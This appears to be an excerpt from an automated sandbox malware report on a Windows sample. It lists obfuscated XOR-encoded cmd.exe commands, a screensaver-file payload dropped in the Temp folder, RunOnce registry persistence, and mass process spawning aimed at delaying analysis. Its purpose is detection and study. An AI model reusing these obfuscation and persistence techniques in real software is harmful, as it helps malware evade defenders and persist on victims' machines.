              Source: Yara matchFile source: 00000000.00000002.21759600322.00000000004A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: asXlZG3aW6.exe PID: 3616, type: MEMORYSTR
              Obfuscated command line found
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 0_2_10002D20 push eax; ret 0_2_10002D4E
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 130_2_367B2806 push ecx; ret 130_2_367B2819
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_0044693D push ecx; ret 131_2_0044694D
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_0044DB70 push eax; ret 131_2_0044DB84
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_0044DB70 push eax; ret 131_2_0044DBAC
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_00451D54 push eax; ret 131_2_00451D61
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_0044B090 push eax; ret 132_2_0044B0A4
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_0044B090 push eax; ret 132_2_0044B0CC
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_00451D34 push eax; ret 132_2_00451D41
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_00444E71 push ecx; ret 132_2_00444E81
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_00414060 push eax; ret 133_2_00414074
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_00414060 push eax; ret 133_2_0041409C
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_00414039 push ecx; ret 133_2_00414049
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_004164EB push 0000006Ah; retf 133_2_004165C4
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_00416553 push 0000006Ah; retf 133_2_004165C4
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_00416555 push 0000006Ah; retf 133_2_004165C4

              Persistence and Installation Behavior

              barindex
              Drops PE files with a suspicious file extension
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile created: C:\Users\user\AppData\Local\Temp\Overskuelighedsgrunde\Uforsvarlige.scrJump to dropped file
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile created: C:\Users\user\AppData\Local\Temp\Overskuelighedsgrunde\Uforsvarlige.scrJump to dropped file
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile created: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile created: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\nsExec.dllJump to dropped file

              Boot Survival

              barindex
              Creates autostart registry keys with suspicious values (likely registry only malware)
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Lunendes C:\Users\user\AppData\Local\Temp\Overskuelighedsgrunde\Uforsvarlige.scrJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Lunendes C:\Users\user\AppData\Local\Temp\Overskuelighedsgrunde\Uforsvarlige.scrJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce LunendesJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce LunendesJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce LunendesJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce LunendesJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,132_2_004047CB
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Mass process execution to delay analysis
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
